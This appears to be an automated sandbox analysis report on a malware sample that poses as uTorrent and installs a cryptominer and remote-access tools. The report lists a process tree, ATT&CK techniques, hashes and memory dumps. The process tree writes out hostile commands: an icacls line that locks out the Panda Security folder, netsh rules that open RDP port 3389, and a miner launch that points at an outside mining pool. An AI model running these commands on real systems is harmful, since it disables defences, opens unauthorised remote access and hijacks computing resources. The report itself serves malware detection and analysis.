C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
2⤵
PID:976

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4756

C:\Programdata\Install\utorrent.exe
C:\Programdata\Install\utorrent.exe
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- NTFS ADS
PID:2920

C:\ProgramData\WindowsTask\azur.exe
C:\ProgramData\WindowsTask\azur.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
4⤵
PID:4376

C:\Windows\SysWOW64\timeout.exe
C:\Windows\system32\timeout.exe 3
5⤵
- Delays execution with timeout.exe
PID:4472

C:\ProgramData\WindowsTask\system.exe
C:\ProgramData\WindowsTask\system.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\selfDel.bat" "
4⤵
PID:2912

C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -u
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:392

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall delete rule name="Remote Desktop"
4⤵
PID:3676

C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -i
3⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:2060

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
4⤵
PID:5100

C:\ProgramData\RealtekHD\taskhost.exe
C:\ProgramData\RealtekHD\taskhost.exe
2⤵
- Executes dropped EXE
PID:4760

C:\ProgramData\RealtekHD\taskhostw.exe
C:\ProgramData\RealtekHD\taskhostw.exe
2⤵
- Executes dropped EXE
PID:3000

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2908

C:\Programdata\RealtekHD\taskhost.exe
C:\Programdata\RealtekHD\taskhost.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
PID:4920

C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
2⤵
- Executes dropped EXE
PID:4456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
3⤵
PID:3584

C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
4⤵
PID:4416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
2⤵
PID:4736

C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:4768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
2⤵
PID:3848

C:\Windows\system32\gpupdate.exe
gpupdate /force
3⤵
PID:4268

C:\ProgramData\WindowsTask\audiodg.exe
C:\ProgramData\WindowsTask\audiodg.exe
2⤵
- Executes dropped EXE
PID:2892

C:\ProgramData\WindowsTask\MicrosoftHost.exe
C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4180

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:3968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4120

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3992

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:4352

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:1932

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:3968

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:840

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:1840

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5048

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:2492

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:304

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:1932

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:1236

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:1156

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:1836

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:3220

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:2716

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:3592

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Hidden Files and Directories

Impair Defenses

Modify Registry

Web Service

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\System\iediagcmd.exe

Download Submit
C:\ProgramData\Microsoft\Check\Check.txt

Download Submit
C:\ProgramData\Microsoft\Intel\R8.exe

Download Submit
C:\ProgramData\Microsoft\Intel\R8.exe

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Download Submit
C:\ProgramData\RDPWinst.exe

Download Submit
C:\ProgramData\RDPWinst.exe

Download Submit
C:\ProgramData\RDPWinst.exe

Download Submit
C:\ProgramData\RealtekHD\taskhost.exe

Download Submit
C:\ProgramData\RealtekHD\taskhost.exe

Download Submit
C:\ProgramData\RealtekHD\taskhost.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\WindowsTask\MicrosoftHost.exe

MD5
191f67bf26f68cef47359b43facfa089

SHA1
94529e37aa179e44e22e9ccd6ee0de8a49a8f2fc

SHA256
2144c0d5d80613e66c393271c11c374afc57ae910d455bed661bb5cb04c1d2c5

SHA512
7d8de83158acf23b8a3fda50106e36f59c3888c99e45b8fa46599c45f6e80e3b6e4cdcbbf440f442446a93933685e086925338320716d3919a9033118425102b

Download Submit
C:\ProgramData\WindowsTask\MicrosoftHost.exe

MD5
191f67bf26f68cef47359b43facfa089

SHA1
94529e37aa179e44e22e9ccd6ee0de8a49a8f2fc

SHA256
2144c0d5d80613e66c393271c11c374afc57ae910d455bed661bb5cb04c1d2c5

SHA512
7d8de83158acf23b8a3fda50106e36f59c3888c99e45b8fa46599c45f6e80e3b6e4cdcbbf440f442446a93933685e086925338320716d3919a9033118425102b

Download Submit
C:\ProgramData\WindowsTask\audiodg.exe

Download Submit
C:\ProgramData\WindowsTask\audiodg.exe

Download Submit
C:\ProgramData\WindowsTask\azur.exe

MD5
bfa81a720e99d6238bc6327ab68956d9

SHA1
c7039fadffccb79534a1bf547a73500298a36fa0

SHA256
222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f

SHA512
5ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab

Download Submit
C:\ProgramData\WindowsTask\azur.exe

Download Submit
C:\ProgramData\WindowsTask\system.exe

MD5
49e31c4bcd9f86ba897dc7e64176dc50

SHA1
cbf0134bd25fd631c3baae23b9e5c79dffef870a

SHA256
006c8ee1ba292e19b1ee6d74d2eb3f8ca8f2c5a9e51a12b37501ea658e10c641

SHA512
b1ffb2eb281bd773eecfbf6df1d92073cba3298749736c775a82974f80cc938ffcf281a9cfd6bb0f8aa9961f9ee92e9a641cddae4f9e141190fdc569a24b1d70

Download Submit
C:\ProgramData\WindowsTask\system.exe

MD5
49e31c4bcd9f86ba897dc7e64176dc50

SHA1
cbf0134bd25fd631c3baae23b9e5c79dffef870a

SHA256
006c8ee1ba292e19b1ee6d74d2eb3f8ca8f2c5a9e51a12b37501ea658e10c641

SHA512
b1ffb2eb281bd773eecfbf6df1d92073cba3298749736c775a82974f80cc938ffcf281a9cfd6bb0f8aa9961f9ee92e9a641cddae4f9e141190fdc569a24b1d70

Download Submit
C:\ProgramData\WindowsTask\update.exe

MD5
c830b8a074455cc0777ed5bc0bfd2678

SHA1
bff2a96c092f8c5620a4d4621343594cd8892615

SHA256
3567966f3f2aa2e44d42b4bd3adae3c5bb121296c1901f69547ad36cd0d0f5f9

SHA512
c90eb64fee3ab08b8f23fc8958fd7f69c1decbe4295d071d07dc427042e53796edf511e7d61600dcdb7d7429925135f42752e199785049134ac7c0dbbf15f541

Download Submit
C:\ProgramData\WindowsTask\update.exe

MD5
c830b8a074455cc0777ed5bc0bfd2678

SHA1
bff2a96c092f8c5620a4d4621343594cd8892615

SHA256
3567966f3f2aa2e44d42b4bd3adae3c5bb121296c1901f69547ad36cd0d0f5f9

SHA512
c90eb64fee3ab08b8f23fc8958fd7f69c1decbe4295d071d07dc427042e53796edf511e7d61600dcdb7d7429925135f42752e199785049134ac7c0dbbf15f541

Download Submit
C:\ProgramData\WindowsTask\winlogon.exe

MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\ProgramData\Windows\install.vbs

Download Submit
C:\ProgramData\Windows\reg1.reg

Download Submit
C:\ProgramData\Windows\reg2.reg

Download Submit
C:\ProgramData\Windows\rutserv.exe

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\vp8decoder.dll

MD5
88318158527985702f61d169434a4940

SHA1
3cc751ba256b5727eb0713aad6f554ff1e7bca57

SHA256
4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

SHA512
5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

Download Submit
C:\ProgramData\Windows\vp8encoder.dll

MD5
6298c0af3d1d563834a218a9cc9f54bd

SHA1
0185cd591e454ed072e5a5077b25c612f6849dc9

SHA256
81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

SHA512
389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

Download Submit
C:\ProgramData\Windows\winit.exe

Download Submit
C:\ProgramData\Windows\winit.exe

Download Submit
C:\ProgramData\install\cheat.exe

Download Submit
C:\ProgramData\install\utorrent.exe

MD5
8590e82b692b429189d114dda535b6e8

SHA1
5d527ad806ac740e2e2769f149270be6a722e155

SHA256
af5d5c340c063e7f4a70bd55ce1634b910e5d43d59c1008b4ad38d2c52c8db7d

SHA512
0747d770a6e5cc1fcd0b3ed060eaaa37531c9483620253aec8fc8fb472435d14b235e10339e52a41a563a0bc9af4e109940a71bb4e08495563ef7c581e962fda

Download Submit
C:\Programdata\Install\del.bat

Download Submit
C:\Programdata\Install\utorrent.exe

MD5
8590e82b692b429189d114dda535b6e8

SHA1
5d527ad806ac740e2e2769f149270be6a722e155

SHA256
af5d5c340c063e7f4a70bd55ce1634b910e5d43d59c1008b4ad38d2c52c8db7d

SHA512
0747d770a6e5cc1fcd0b3ed060eaaa37531c9483620253aec8fc8fb472435d14b235e10339e52a41a563a0bc9af4e109940a71bb4e08495563ef7c581e962fda

Download Submit
C:\Programdata\RealtekHD\taskhostw.exe

Download Submit
C:\Programdata\WindowsTask\winlogon.exe

MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\Programdata\Windows\install.bat

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1FC0448E6D3D5712272FAF5B90A70C5E

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1FC0448E6D3D5712272FAF5B90A70C5E

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

Download Submit
C:\Users\Admin\AppData\Local\Temp\selfDel.bat

Download Submit
C:\Windows\System32\drivers\etc\hosts

Download Submit
C:\programdata\install\cheat.exe

Download Submit
C:\programdata\microsoft\temp\H.bat

Download Submit
C:\rdp\RDPWInst.exe

Download Submit
C:\rdp\RDPWInst.exe

Download Submit
C:\rdp\RDPWInst.exe

Download Submit
C:\rdp\Rar.exe

Download Submit
C:\rdp\Rar.exe

Download Submit
C:\rdp\bat.bat

Download Submit
C:\rdp\db.rar

Download Submit
C:\rdp\install.vbs

Download Submit
C:\rdp\pause.bat

Download Submit
C:\rdp\run.vbs

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Download Submit
\Program Files\RDP Wrapper\rdpwrap.dll

Download Submit
\Program Files\RDP Wrapper\rdpwrap.dll

Download Submit
\Users\Admin\AppData\Local\Temp\4210A729\mozglue.dll

Download Submit
\Users\Admin\AppData\Local\Temp\4210A729\msvcp140.dll

Download Submit
\Users\Admin\AppData\Local\Temp\4210A729\nss3.dll

Download Submit
\Users\Admin\AppData\Local\Temp\4210A729\vcruntime140.dll

Download Submit
memory/188-35-0x0000000000000000-mapping.dmp

Download
memory/196-70-0x0000000000000000-mapping.dmp

Download
memory/392-497-0x0000000000000000-mapping.dmp

Download
memory/416-64-0x0000000000000000-mapping.dmp

Download
memory/484-44-0x0000000002EF0000-0x0000000002EF1000-memory.dmp

Filesize
4KB

Download
memory/484-43-0x00000000036F0000-0x00000000036F1000-memory.dmp

Filesize
4KB

Download
memory/484-36-0x0000000000000000-mapping.dmp

Download
memory/484-42-0x0000000002EF0000-0x0000000002EF1000-memory.dmp

Filesize
4KB

Download
memory/500-75-0x0000000000000000-mapping.dmp

Download
memory/508-3-0x0000000000000000-mapping.dmp

Download
memory/628-69-0x0000000000000000-mapping.dmp

Download
memory/636-83-0x0000000000000000-mapping.dmp

Download
memory/684-34-0x0000000000000000-mapping.dmp

Download
memory/732-181-0x0000000000000000-mapping.dmp

Download
memory/768-151-0x0000000000000000-mapping.dmp

Download
memory/796-63-0x0000000000000000-mapping.dmp

Download
memory/848-30-0x0000000000000000-mapping.dmp

Download
memory/976-219-0x0000000000000000-mapping.dmp

Download
memory/980-163-0x0000000000000000-mapping.dmp

Download
memory/996-80-0x0000000000000000-mapping.dmp

Download
memory/1164-485-0x0000000000000000-mapping.dmp

Download
memory/1168-54-0x0000000000000000-mapping.dmp

Download
memory/1196-155-0x0000000000000000-mapping.dmp

Download
memory/1200-39-0x0000000000000000-mapping.dmp

Download
memory/1268-153-0x0000000000000000-mapping.dmp

Download
memory/1276-186-0x0000000000000000-mapping.dmp

Download
memory/1280-74-0x0000000000000000-mapping.dmp

Download
memory/1320-185-0x0000000000000000-mapping.dmp

Download
memory/1340-214-0x0000000000000000-mapping.dmp

Download
memory/1348-21-0x0000000000000000-mapping.dmp

Download
memory/1400-213-0x0000000000000000-mapping.dmp

Download
memory/1488-116-0x0000000000000000-mapping.dmp

Download
memory/1612-61-0x0000000000000000-mapping.dmp

Download
memory/1796-52-0x0000000000000000-mapping.dmp

Download
memory/1904-218-0x0000000000000000-mapping.dmp

Download
memory/2060-510-0x0000000000000000-mapping.dmp

Download
memory/2092-330-0x0000000000000000-mapping.dmp

Download
memory/2100-27-0x0000000000000000-mapping.dmp

Download
memory/2108-338-0x0000000000000000-mapping.dmp

Download
memory/2128-50-0x0000000000000000-mapping.dmp

Download
memory/2168-487-0x0000000000000000-mapping.dmp

Download
memory/2172-78-0x0000000000000000-mapping.dmp

Download
memory/2228-22-0x0000000000000000-mapping.dmp

Download
memory/2248-46-0x0000000000000000-mapping.dmp

Download
memory/2272-211-0x0000000000000000-mapping.dmp

Download
memory/2296-23-0x0000000000000000-mapping.dmp

Download
memory/2384-187-0x0000000000000000-mapping.dmp

Download
memory/2408-345-0x0000000000000000-mapping.dmp

Download
memory/2476-62-0x0000000000000000-mapping.dmp

Download
memory/2496-336-0x0000000000000000-mapping.dmp

Download
memory/2520-156-0x0000000000000000-mapping.dmp

Download
memory/2588-55-0x0000000000000000-mapping.dmp

Download
memory/2620-488-0x0000000000000000-mapping.dmp

Download
memory/2624-84-0x0000000000000000-mapping.dmp

Download
memory/2880-76-0x0000000000000000-mapping.dmp

Download
memory/2892-522-0x0000000000000000-mapping.dmp

Download
memory/2912-519-0x0000000000000000-mapping.dmp

Download
memory/2920-359-0x0000000000000000-mapping.dmp

Download
memory/2996-51-0x0000000000000000-mapping.dmp

Download
memory/3000-537-0x0000000000000000-mapping.dmp

Download
memory/3012-33-0x0000000000000000-mapping.dmp

Download
memory/3116-79-0x0000000000000000-mapping.dmp

Download
memory/3140-353-0x0000000000000000-mapping.dmp

Download
memory/3144-47-0x0000000000000000-mapping.dmp

Download
memory/3164-57-0x0000000000000000-mapping.dmp

Download
memory/3172-77-0x0000000000000000-mapping.dmp

Download
memory/3176-352-0x0000000000000000-mapping.dmp

Download
memory/3316-192-0x0000000000000000-mapping.dmp

Download
memory/3468-484-0x0000000000000000-mapping.dmp

Download
memory/3472-154-0x0000000000000000-mapping.dmp

Download
memory/3476-40-0x0000000000000000-mapping.dmp

Download
memory/3508-82-0x0000000000000000-mapping.dmp

Download
memory/3548-41-0x0000000000000000-mapping.dmp

Download
memory/3584-480-0x0000000000000000-mapping.dmp

Download
memory/3656-49-0x0000000000000000-mapping.dmp

Download
memory/3676-501-0x0000000000000000-mapping.dmp

Download
memory/3704-190-0x0000000000000000-mapping.dmp

Download
memory/3728-73-0x0000000000000000-mapping.dmp

Download
memory/3736-72-0x0000000000000000-mapping.dmp

Download
memory/3748-65-0x0000000000000000-mapping.dmp

Download
memory/3764-29-0x0000000000000000-mapping.dmp

Download
memory/3768-81-0x0000000000000000-mapping.dmp

Download
memory/3780-0-0x0000000000000000-mapping.dmp

Download
memory/3840-67-0x0000000000000000-mapping.dmp

Download
memory/3848-507-0x0000000000000000-mapping.dmp

Download
memory/3852-66-0x0000000000000000-mapping.dmp

Download
memory/3856-71-0x0000000000000000-mapping.dmp

Download
memory/3864-68-0x0000000000000000-mapping.dmp

Download
memory/3928-17-0x0000000000000000-mapping.dmp

Download
memory/4004-207-0x0000000000000000-mapping.dmp

Download
memory/4016-60-0x0000000000000000-mapping.dmp

Download
memory/4064-189-0x0000000000000000-mapping.dmp

Download
memory/4100-471-0x0000000000000000-mapping.dmp

Download
memory/4104-216-0x0000000000000000-mapping.dmp

Download
memory/4124-85-0x0000000000000000-mapping.dmp

Download
memory/4128-332-0x0000000000000000-mapping.dmp

Download
memory/4136-183-0x0000000000000000-mapping.dmp

Download
memory/4140-354-0x0000000000000000-mapping.dmp

Download
memory/4148-86-0x0000000000000000-mapping.dmp

Download
memory/4152-205-0x0000000000000000-mapping.dmp

Download
memory/4156-117-0x0000000000000000-mapping.dmp

Download
memory/4160-87-0x0000000000000000-mapping.dmp

Download
memory/4168-175-0x0000000000000000-mapping.dmp

Download
memory/4172-178-0x0000000000000000-mapping.dmp

Download
memory/4176-500-0x00000000057D0000-0x00000000057D1000-memory.dmp

Filesize
4KB

Download
memory/4176-477-0x0000000005A80000-0x0000000005A81000-memory.dmp

Filesize
4KB

Download
memory/4176-472-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

Filesize
4KB

Download
memory/4176-467-0x0000000000000000-mapping.dmp

Download
memory/4176-517-0x0000000008420000-0x0000000008421000-memory.dmp

Filesize
4KB

Download
memory/4176-470-0x0000000071E70000-0x000000007255E000-memory.dmp

Filesize
6.9MB

Download
memory/4176-515-0x0000000007210000-0x0000000007211000-memory.dmp

Filesize
4KB

Download
memory/4176-492-0x0000000005580000-0x0000000005581000-memory.dmp

Filesize
4KB

Download
memory/4176-506-0x00000000076D0000-0x00000000076D1000-memory.dmp

Filesize
4KB

Download
memory/4176-490-0x0000000005540000-0x0000000005541000-memory.dmp

Filesize
4KB

Download
memory/4176-505-0x0000000006FD0000-0x0000000006FD1000-memory.dmp

Filesize
4KB

Download
memory/4176-483-0x00000000054E0000-0x00000000054E1000-memory.dmp

Filesize
4KB

Download
memory/4176-503-0x0000000006900000-0x0000000006901000-memory.dmp

Filesize
4KB

Download
memory/4176-502-0x0000000006360000-0x0000000006361000-memory.dmp

Filesize
4KB

Download
memory/4176-518-0x0000000008510000-0x0000000008511000-memory.dmp

Filesize
4KB

Download
memory/4180-526-0x0000000000000000-mapping.dmp

Download
memory/4180-528-0x00007FF7650C0000-0x00007FF765660000-memory.dmp

Filesize
5.6MB

Download
memory/4184-118-0x0000000000000000-mapping.dmp

Download
memory/4192-210-0x0000000000000000-mapping.dmp

Download
memory/4196-176-0x0000000000000000-mapping.dmp

Download
memory/4212-152-0x0000000000000000-mapping.dmp

Download
memory/4236-89-0x0000000000000000-mapping.dmp

Download
memory/4240-335-0x0000000000000000-mapping.dmp

Download
memory/4244-88-0x0000000000000000-mapping.dmp

Download
memory/4248-227-0x0000000000000000-mapping.dmp

Download
memory/4256-324-0x0000000000000000-mapping.dmp

Download
memory/4260-90-0x0000000000000000-mapping.dmp

Download
memory/4264-203-0x0000000000000000-mapping.dmp

Download
memory/4268-509-0x0000000000000000-mapping.dmp

Download
memory/4276-91-0x0000000000000000-mapping.dmp

Download
memory/4280-349-0x0000000000000000-mapping.dmp

Download
memory/4292-177-0x0000000000000000-mapping.dmp

Download
memory/4296-150-0x0000000000000000-mapping.dmp

Download
memory/4300-144-0x0000000000000000-mapping.dmp

Download
memory/4304-92-0x0000000000000000-mapping.dmp

Download
memory/4308-486-0x0000000000000000-mapping.dmp

Download
memory/4316-145-0x0000000000000000-mapping.dmp

Download
memory/4324-327-0x0000000000000000-mapping.dmp

Download
memory/4336-326-0x0000000000000000-mapping.dmp

Download
memory/4344-146-0x0000000000000000-mapping.dmp

Download
memory/4364-356-0x0000000000000000-mapping.dmp

Download
memory/4368-333-0x0000000000000000-mapping.dmp

Download
memory/4376-374-0x0000000000000000-mapping.dmp

Download
memory/4380-121-0x0000000000000000-mapping.dmp

Download
memory/4384-123-0x0000000000000000-mapping.dmp

Download
memory/4388-182-0x0000000000000000-mapping.dmp

Download
memory/4392-149-0x0000000000000000-mapping.dmp

Download
memory/4392-478-0x0000000000000000-mapping.dmp

Download
memory/4400-148-0x0000000000000000-mapping.dmp

Download
memory/4404-179-0x0000000000000000-mapping.dmp

Download
memory/4412-93-0x0000000000000000-mapping.dmp

Download
memory/4416-491-0x0000000000000000-mapping.dmp

Download
memory/4420-122-0x0000000000000000-mapping.dmp

Download
memory/4428-94-0x0000000000000000-mapping.dmp

Download
memory/4432-119-0x0000000000000000-mapping.dmp

Download
memory/4436-184-0x0000000000000000-mapping.dmp

Download
memory/4440-95-0x0000000000000000-mapping.dmp

Download
